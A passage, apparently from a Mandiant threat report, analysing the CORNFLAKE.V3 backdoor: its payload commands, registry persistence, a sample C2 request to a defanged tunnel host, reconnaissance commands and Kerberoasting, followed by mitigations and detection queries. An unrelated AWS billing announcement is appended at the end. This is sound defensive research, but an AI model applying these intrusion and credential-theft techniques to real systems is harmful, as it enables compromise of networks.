If the response does not match one of the aforementioned 2 values, the malware interprets the response as a payload and parses the last byte of the response after XOR decrypting it. The following values are accepted by the program:
Command
Type
Description
0
EXE
The received payload is written to %APPDATA%<random_8_chars><random_8_chars>.exe and launched using the Node.js child_process.spawn()function.
1
DLL
The received payload is written to %APPDATA%<random_8_chars><random_8_chars>.dll and launched using the Node.js child_process.spawn()function as an argument to rundll32.exe.
2
JS
The received payload is launched from memory as an argument to node.exe using the Node.js child_process.spawn()function.
3
CMD
The received payload is launched from memory as an argument to cmd.exeusing the Node.js child_process.spawn()function. Additionally, the output is saved in the LastCmd variable and sent to the C2 in the next request.
4
Other
The payload is written to %APPDATA%<random_8_chars><random_8_chars>.log.
Table 2: CORNFLAKE.V3 supported payloads
Persistence
The atst function, called by main, attempts to establish persistence on the host by creating a new registry Run key named ChromeUpdaterunder HKCUSoftwareMicrosoftWindowsCurrentVersionRun.
The malware uses wmic.exe to obtain the command line arguments of the currently running node.exe process. If node.exe was launched with the -e argument, like the malware does initially, the script extracts the argument after -e, which contains the full malicious script. This script is written to the <random_8_chars>.log file in the Node.js installation directory and its path is saved to the path2file variable.
If node.exe was instead launched with a file as an argument (such as during the persistence phase), the path to this file is extracted and saved to the path2file variable.
The path2file variable is then set as an argument tonode.exe in the newly created ChromeUpdater registry key. This ensures that the malware executes upon user logon.
Executed Payloads
As observed in the main function, this sample can receive and execute different types of payloads from its C2 server. This section describes two payloads that were observed in our investigation.
Active Directory Reconnaissance
The first payload observed on the host was a batch script containing reconnaissance commands. The script initially determines if the host is domain-joined, this condition determines which specific reconnaissance type is executed.
Domain Joined
Query Active Directory Computer Count: Attempts to connect to Active Directory and count the total number of computer objects registered in the domain.
Display Detailed User Context: Executeswhoami /all to reveal the current user’s Security Identifier (SID), domain and local group memberships, and assigned security privileges.
Enumerate Domain Trusts: Executes nltest /domain_trusts to list all domains that the current computer’s domain has trust relationships with (both incoming and outgoing).
List Domain Controllers: Executes nltest /dclist : to find and list the available Domain Controllers (DCs) for the computer’s current domain.
Query Service Principal Names (SPNs): Executes setspn -T <UserDomain> -Q */*to query for all SPNs registered in the user’s logon domain, then filters the results (Select-String) to specifically highlight SPNs potentially associated with user accounts (lines starting CN=…Users).
Not Domain Joined
Enumerate Local Groups: Uses Get-LocalGroup to list all security groups defined locally on the machine.
Enumerate Local Group Members: For each local group found, uses Get-LocalGroupMember to list the accounts (users or other groups) that are members of that group, displaying their Name and PrincipalSource (e.g., Local, MicrosoftAccount).
Kerberoasting
The second script executed is a batch script which attempts to harvest credentials via Kerberoasting. The script queries Active Directory for user accounts configured with SPNs (often an indication of a service account using user credentials). For each of these, it requests a Kerberos service ticket from which a password hash is extracted and formatted. These hashes are exfiltrated to the C2 server, where the attacker can attempt to crack them.
Mandiant Threat Defense recently observed a new PHP-based CORNFLAKE.V3 variant which has similar functionality to the previous Node.js based iterations.
This version was dropped by an in-memory script which was executed as a result of interaction with a malicious ClickFix lure page.
The script downloads the PHP package from windows.php[.]net,writes it to disk as php.zipand extracts its contents to the C:Users<User>AppDataRoamingphpdirectory. The CORNFLAKE.V3 PHP sample is contained in theconfig.cfg file that was also dropped in the same directory and executed with the following command line arguments:
To maintain persistence on the host, this variant utilizes a registry Run key named after a randomly chosen directory in %APPDATA% or %LOCALAPPDATA% instead of the fixed ChromeUpdater string used in the Node.js version. To communicate with its C2 a unique path is generated for each request, unlike the static/init1234 path:
POST /ue/2&290cd148ed2f4995f099b7370437509b/fTqvlt HTTP/1.1
Host: varying-rentals-calgary-predict.trycloudflare[.]com
Connection: close
Content-Length: 39185
Content-type: application/octet-stream
Much like the Node.js version, the last byte of the received payload determines the payload type, however, these values differ in the PHP version:
Command
Type
Notes
0
EXE
This decrypted content is saved to a temporary executable file (<rand_8_char>.exe) created in a random directory within the user’s %APPDATA% folder, and executed through PowerShell as a hidden process.
1
DLL
The decrypted content is saved as a <rand_8_char>.png file in a temporary directory within the user’s %APPDATA% folder. Subsequently, rundll32.exe is invoked to execute the downloaded file.
2
JS
This decrypted content is saved as a <rand_8_char>.jpg file in a temporary directory within the user’s %APPDATA% folder. The script attempts to check if Node.js is installed. If Node.js is not found or fails to install from a hardcoded URL (http://nodejs[.]org/dist/v21.7.3/node-v21.7.3-win-x64.zip), an error message is printed. If Node.js is available, the downloaded JavaScript (.jpg) file is executed using node.exe.
3
CMD
This decrypted data is executed as a provided command string via cmd.exe or powershell.exe.
4
ACTIVE
This command reports the active_cnt (stored in the $qRunq global variable) to the C2 server. This likely serves as a heartbeat or activity metric for the implant.
5
AUTORUN
The malware attempts to establish persistence by adding a registry entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run that points to the script’s PHP binary and its own path.
6
OFF
This command directly calls exit(0), which terminates the PHP script’s execution.
OTHER
If none of the specific commands match, the received data is saved as a .txt file in a temporary directory within the user’s %APPDATA% folder.
The Javascript payload execution functionality was retained by implementing the download of the Node.js runtime environment inside the JS command. Other notable changes include the change of the DLL and JS payload file extensions into .png and .jpg to evade detection and the addition of the ACTIVE and AUTORUN commands. However, the main functionality of the backdoor remains unchanged despite the transition from Node.js to PHP.
These changes suggest an ongoing effort by the threat actor to refine their malware against evolving security measures.
Executed Payloads
Active Directory Reconnaissance
A cmd.exe reconnaissance payload similar to the one encountered in the Node.js variant was received from the C2 server and executed. The script checks if the machine is part of an Active Directory domain and collects the following information using powershell:
Domain Joined
Total count of computer accounts in AD.
Domain trust relationships.
List of all Domain Controllers.
Members of the “Domain Admins” group.
User accounts configured with a Service Principal Name (SPN).
All local groups and their members
Current User name, SID, local group memberships and security privileges
Not Domain Joined
All local groups and their members
Current User name, SID, local group memberships and security privileges
WINDYTWIST.SEA Backdoor
Following the interaction with its C2 server, a DLL payload (corresponding to command 1) was received, written to disk as C:Users<User>AppDataRoamingShift19434078G0ZrQi.pngand executed using rundll32. This file was a WINDYTWIST.SEA backdoor implant configured with the following C2 servers:
This implant is a C version of the Java WINDYTWIST backdoor, which supports relaying TCP traffic, providing a reverse shell, executing commands, and deleting itself. In previous intrusions, Mandiant observed WINDYTWIST.SEA samples attempting to move laterally in the network of the infected machine.
The following process tree was observed during the infection:
This investigation highlights the collaborative nature of modern cyber threats, where UNC5518 leverages compromised websites and deceptive ClickFix lures to gain initial access. This access is then utilized by other actors like UNC5774, who deploy versatile malware such as the CORNFLAKE.V3 backdoor. The subsequent reconnaissance and credential harvesting activities we observed indicate that the attackers intend to move laterally and expand their foothold in the environment.
To mitigate malware execution through ClickFix, organizations should disable the Windows Run dialog box where possible. Regular simulation exercises are crucial to counter this and other social engineering tactics. Furthermore, robust logging and monitoring systems are essential for detecting the execution of subsequent payloads, such as those associated with CORNFLAKE.V3.
Acknowledgements
Special thanks to Diana Ion, Yash Gupta, Rufus Brown, Mike Hunhoff, Genwei Jiang, Mon Liclican, Preston Lewis, Steve Sedotto, Elvis Miezitis and Rommel Joven for their valuable contributions to this blog post.
Detection Through Google Security Operations
For detailed guidance on hunting for this activity using the following queries, and for a forum to engage with our security experts, please visit our companion post on theGoogle Cloud Community blog.
Mandiant has made the relevant rules available in the Google SecOps Mandiant Frontline Threats curated detections rule set. The activity discussed in the blog post is detected in Google SecOps under the rule names:
Powershell Executing NodeJS
Powershell Writing To Appdata
Suspicious Clipboard Interaction
NodeJS Reverse Shell Execution
Download to the Windows Public User Directory via PowerShell
Run Utility Spawning Suspicious Process
WSH Startup Folder LNK Creation
Trycloudflare Tunnel Network Connections
SecOps Hunting Queries
The following UDM queries can be used to identify potential compromises within your environment.
Execution of CORNFLAKE.V3 — Node.js
Search for potential compromise activity where PowerShell is used to launch node.exe from %AppData% path with the -e argument, indicating direct execution of a malicious JavaScript string.
Search for compromise activity where PowerShell is executing php.exe from %AppData% path. This variant is characterized by the use of the -d argument, executing a PHP script without a .php file extension, and passing the argument 1 to the PHP interpreter, indicating covert execution of malicious PHP code.
Search suspicious process activity where cmd.exe or powershell.exe are spawned as child processes from node.exe or php.exe when those executables are located in %AppData%.
Search unusual network connections initiated by powershell.exe or mshta.exe to legitimate Node.js (nodejs.org) or PHP (windows.php.net) infrastructure domains.
Today, AWS announces the general availability of AWS Billing and Cost Management Dashboards, a new feature within AWS Billing and Cost Management that helps you visualize and analyze your AWS spending in one consolidated view. This feature enables you to create customized dashboards that combine data from AWS Cost Explorer and Savings Plans and Reserved Instance coverage and utilization reports. With Billing and Cost Management Dashboards, you can quickly understand your AWS cost patterns and make informed financial decisions for your organization.
Billing and Cost Management Dashboards allows you to create and customize widgets using various widget types including cost widgets, usage widgets, Savings Plans utilization and coverage widgets, and Reserved Instances utilization and coverage widgets. Each widget can be configured with different visualizations, such as line chart, bar chart, stacked bar chart or tables, and you can customize dashboard layouts by adjusting widget sizes and positions. You can share these dashboards across accounts within or outside your organization, enabling FinOps teams to establish standardized cost reporting practices throughout their organization.
AWS Billing and Cost Management Dashboards is available at no additional cost in all AWS commercial Regions, excluding AWS China Regions. To get started with AWS Billing and Cost Management Dashboards, visit the AWS Billing and Cost Management console and select “Dashboards” from the left navigation menu. For more information, see the AWS Billing and Cost Management Dashboards user guide or blog.